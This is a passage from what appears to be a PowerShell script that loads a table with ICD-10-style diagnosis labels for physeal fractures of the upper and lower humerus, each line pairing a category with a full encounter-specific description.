fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type II physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type II physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type II physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type II physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type II physeal fracture of upper end of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of humerus, right arm","Salter-Harris Type III physeal fracture of upper end of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of humerus, right arm","Salter-Harris Type III physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of humerus, right arm","Salter-Harris Type III physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of humerus, right arm","Salter-Harris Type III physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of humerus, right arm","Salter-Harris Type III physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of humerus, right arm","Salter-Harris Type III physeal fracture of upper end of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of humerus, left arm","Salter-Harris Type III physeal fracture of upper end of humerus, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of humerus, left arm","Salter-Harris Type III physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of humerus, left arm","Salter-Harris Type III physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of humerus, left arm","Salter-Harris Type III physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of humerus, left arm","Salter-Harris Type III physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of humerus, left arm","Salter-Harris Type III physeal fracture of upper end of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type III physeal fracture of upper end of humerus, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type III physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type III physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type III physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type III physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type III physeal fracture of upper end of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of humerus, right arm","Salter-Harris Type IV physeal fracture of upper end of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of humerus, right arm","Salter-Harris Type IV physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of humerus, right arm","Salter-Harris Type IV physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of humerus, right arm","Salter-Harris Type IV physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of humerus, right arm","Salter-Harris Type IV physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of humerus, right arm","Salter-Harris Type IV physeal fracture of upper end of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of humerus, left arm","Salter-Harris Type IV physeal fracture of upper end of humerus, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of humerus, left arm","Salter-Harris Type IV physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of humerus, left arm","Salter-Harris Type IV physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of humerus, left arm","Salter-Harris Type IV physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of humerus, left arm","Salter-Harris Type IV physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of humerus, left arm","Salter-Harris Type IV physeal fracture of upper end of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type IV physeal fracture of upper end of humerus, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type IV physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type IV physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type IV physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type IV physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type IV physeal fracture of upper end of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of humerus, right arm","Other physeal fracture of upper end of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of humerus, right arm","Other physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of humerus, right arm","Other physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of humerus, right arm","Other physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of humerus, right arm","Other physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of humerus, right arm","Other physeal fracture of upper end of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of humerus, left arm","Other physeal fracture of upper end of humerus, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of humerus, left arm","Other physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of humerus, left arm","Other physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of humerus, left arm","Other physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of humerus, left arm","Other physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of humerus, left arm","Other physeal fracture of upper end of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of humerus, unspecified arm","Other physeal fracture of upper end of humerus, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of humerus, unspecified arm","Other physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of humerus, unspecified arm","Other physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of humerus, unspecified arm","Other physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of humerus, unspecified arm","Other physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of humerus, unspecified arm","Other physeal fracture of upper end of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of humerus, right arm","Unspecified physeal fracture of lower end of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of humerus, right arm","Unspecified physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of humerus, right arm","Unspecified physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of humerus, right arm","Unspecified physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of humerus, right arm","Unspecified physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of humerus, right arm","Unspecified physeal fracture of lower end of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of humerus, left arm","Unspecified physeal fracture of lower end of humerus, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of humerus, left arm","Unspecified physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of humerus, left arm","Unspecified physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of humerus, left arm","Unspecified physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of humerus, left arm","Unspecified physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of humerus, left arm","Unspecified physeal fracture of lower end of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of humerus, unspecified arm","Unspecified physeal fracture of lower end of humerus, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of humerus, unspecified arm","Unspecified physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of humerus, unspecified arm","Unspecified physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of humerus, unspecified arm","Unspecified physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of humerus, unspecified arm","Unspecified physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of humerus, unspecified arm","Unspecified physeal fracture of lower end of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of humerus, right arm","Salter-Harris Type I physeal fracture of lower end of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of humerus, right arm","Salter-Harris Type I physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of humerus, right arm","Salter-Harris Type I physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of humerus, right arm","Salter-Harris Type I physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of humerus, right arm","Salter-Harris Type I physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of humerus, right arm","Salter-Harris Type I physeal fracture of lower end of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of humerus, left arm","Salter-Harris Type I physeal fracture of lower end of humerus, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of humerus, left arm","Salter-Harris Type I physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of humerus, left arm","Salter-Harris Type I physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of humerus, left arm","Salter-Harris Type I physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of humerus, left arm","Salter-Harris Type I physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of humerus, left arm","Salter-Harris Type I physeal fracture of lower end of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type I physeal fracture of lower end of humerus, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type I physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type I physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type I physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type I physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type I physeal fracture of lower end of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of humerus, right arm","Salter-Harris Type II physeal fracture of lower end of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of humerus, right arm","Salter-Harris Type II physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of humerus, right arm","Salter-Harris Type II physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of humerus, right arm","Salter-Harris Type II physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of humerus, right arm","Salter-Harris Type II physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of humerus, right arm","Salter-Harris Type II physeal fracture of lower end of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of humerus, left arm","Salter-Harris Type II physeal fracture of lower end of humerus, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of humerus, left arm","Salter-Harris Type II physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of humerus, left arm","Salter-Harris Type II physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of humerus, left arm","Salter-Harris Type II physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of humerus, left arm","Salter-Harris Type II physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of humerus, left arm","Salter-Harris Type II physeal fracture of lower end of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type II physeal fracture of lower end of humerus, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type II physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type II physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type II physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type II physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type II physeal fracture of lower end of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of humerus, right arm","Salter-Harris Type III physeal fracture of lower end of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of humerus, right arm","Salter-Harris Type III physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of humerus, right arm","Salter-Harris Type III physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of humerus, right arm","Salter-Harris Type III physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of humerus, right arm","Salter-Harris Type III physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of humerus, right arm","Salter-Harris Type III physeal fracture of lower end of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of humerus, left arm","Salter-Harris Type III physeal fracture of lower end of humerus, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of humerus, left arm","Salter-Harris Type III physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of humerus, left arm","Salter-Harris Type III physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of humerus, left arm","Salter-Harris Type III physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of humerus, left arm","Salter-Harris Type III physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of humerus, left arm","Salter-Harris Type III physeal fracture of lower end of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type III physeal fracture of lower end of humerus, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type III physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type III physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type III physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type III physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type III physeal fracture of lower end of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of humerus, right arm","Salter-Harris Type IV physeal fracture of lower end of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of humerus, right arm","Salter-Harris Type IV physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of humerus, right arm","Salter-Harris Type IV physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of humerus, right arm","Salter-Harris Type IV physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of humerus, right arm","Salter-Harris Type IV physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of humerus, right arm","Salter-Harris Type IV physeal fracture of lower end of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of humerus, left arm","Salter-Harris Type IV physeal fracture of lower end of humerus, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of humerus, left arm","Salter-Harris Type IV physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of humerus, left arm","Salter-Harris Type IV physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of humerus, left arm","Salter-Harris Type IV physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of humerus, left arm","Salter-Harris Type IV physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of humerus, left arm","Salter-Harris Type IV physeal fracture of lower end of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type IV physeal fracture of lower end of humerus, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type IV physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type IV physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type IV physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type IV physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of humerus, unspecified arm","Salter-Harris Type IV physeal fracture of lower end of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of humerus, right arm","Other physeal fracture of lower end of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of humerus, right arm","Other physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of humerus, right arm","Other physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of humerus, right arm","Other physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of humerus, right arm","Other physeal fracture of lower end of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of humerus, right arm","Other physeal fracture of lower end of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of humerus, left arm","Other physeal fracture of lower end of humerus, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of humerus, left arm","Other physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of humerus, left arm","Other physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of humerus, left arm","Other physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of humerus, left arm","Other physeal fracture of lower end of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of humerus, left arm","Other physeal fracture of lower end of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of humerus, unspecified arm","Other physeal fracture of lower end of humerus, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of humerus, unspecified arm","Other physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of humerus, unspecified arm","Other physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of humerus, unspecified arm","Other physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of humerus, unspecified arm","Other physeal fracture of lower end of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower 